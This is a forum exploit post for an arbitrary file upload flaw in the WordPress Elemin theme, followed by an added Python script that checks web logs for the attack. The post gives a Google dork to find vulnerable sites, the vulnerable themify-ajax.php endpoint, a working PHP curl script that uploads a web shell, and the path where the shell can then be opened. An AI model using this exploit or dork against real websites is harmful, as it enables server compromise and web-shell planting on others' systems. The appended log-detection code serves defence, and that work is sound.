WordPress Elemin Shell Upload
#1
Exploit Title : Wordpress Themes Elemin Arbitrary File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/Elemin
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome


#Dork : inurl:/wp-content/themes/elemin/

#
Code:
Exploit : http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php

#POC :

Code:
<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Code:
#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/elemin/uploads/{YOUR_FILE}.php
#2
Thanks for your effort
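Added example, not part of the original thread: a web access log check for the two requests post #1 describes, a POST to `themify-ajax.php` with the `upload` parameter and a later fetch of a script file from the theme's `uploads/` directory. The Apache/nginx "combined" log format, the script-extension list, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths come from the post; the "combined" log format is an assumption.
UPLOAD_ENDPOINT = "/wp-content/themes/elemin/themify/themify-ajax.php"
UPLOAD_DIR = "/wp-content/themes/elemin/uploads/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|asp|aspx)$", re.I)
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Dec/2016:10:00:01 +0000] "POST /blog/wp-content/themes/elemin/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 31 "-" "curl"
203.0.113.7 - - [01/Dec/2016:10:00:05 +0000] "GET /blog/wp-content/themes/elemin/uploads/x.php HTTP/1.1" 200 512 "-" "curl"
198.51.100.4 - - [01/Dec/2016:10:02:00 +0000] "GET /blog/wp-content/themes/elemin/uploads/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Dec/2016:10:03:00 +0000] "GET /blog/wp-content/themes/elemin/themify/themify-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.9 - - [01/Dec/2016:10:04:00 +0000] "GET /blog/wp-content/themes/elemin/uploads/a%2Ephp HTTP/1.1" 404 0 "-" "scanner"
"""

def scan(log_text):
    """Return (ip, kind, path, status) findings; kind is 'upload' or 'script-hit'."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        url = urlsplit(m["target"])
        path = unquote(url.path)  # decode %2E and similar before matching
        status = int(m["status"])
        is_upload = (m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT)
                     and "upload" in parse_qs(url.query, keep_blank_values=True))
        if is_upload:
            findings.append((m["ip"], "upload", path, status))
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            findings.append((m["ip"], "script-hit", path, status))
    return findings

def confirmed(findings):
    """Client IPs with a 200 upload POST followed by a 200 script fetch."""
    uploaders, hits = set(), set()
    for ip, kind, _, status in findings:
        if kind == "upload" and status == 200:
            uploaders.add(ip)
        elif kind == "script-hit" and status == 200 and ip in uploaders:
            hits.add(ip)
    return sorted(hits)

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
    print("priority:", confirmed(scan(SAMPLE_LOG)))
```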
